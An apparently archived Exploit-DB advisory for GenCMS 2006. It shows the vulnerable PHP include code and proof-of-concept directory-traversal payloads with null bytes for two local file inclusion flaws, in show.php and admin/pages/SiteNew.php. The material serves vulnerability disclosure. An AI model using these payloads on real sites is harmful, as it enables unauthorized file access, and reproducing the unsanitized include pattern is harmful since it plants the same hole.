gencms 2006 - Multiple Vulnerabilities

EDB-ID:

9103


Author:

eLwaux

Type:

webapps


Platform:

PHP

Date:

2009-07-10


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

GenCMS
http://gencms.berlios.de/

eLwaux(c)2009

LFI
/show.php
----------------------------------------------------------------------------------------------------
18:   $param = $_GET['p'];
19:   if(empty($param)) $param = 'news';
20:          //get right page
21:       //$page = $param.'.php';
22:	
23:    //static or dynamic
24:    if(GC_FULLSTATIC)
25:    {
26:        $page = $param.'.htm';
27:        staticpage($page);
28:    }
29:    else
30:    {
31:        $page = GC_IPATH.'_base/sites/'.$param.'.php';
32:        dynamicpage($page);
33:    }
----------------------------------------------------------------------------------------------------
PoC: /show.php?p=../../{FILE.PHP}%00


LFI
/admin/pages/SiteNew.php
----------------------------------------------------------------------------------------------------
14:   if(!empty($_GET['step'])) $Step = $_GET['step'];
23:   if ($Step == "2")
24:   {
25:        // allgemeine settings
26:        //include blocks from template config
27:        include_once(GC_IPATH.'templates/'.$_POST['Template'].'/config.php');
28:        $TPLBlocks = explode(';',$TemplateSettings);
29:   }
----------------------------------------------------------------------------------------------------
PoC: /admin/pages/SiteNew.php?step=2& ( POST: Template=../{FILE.PHP}%00 )

# milw0rm.com [2009-07-10]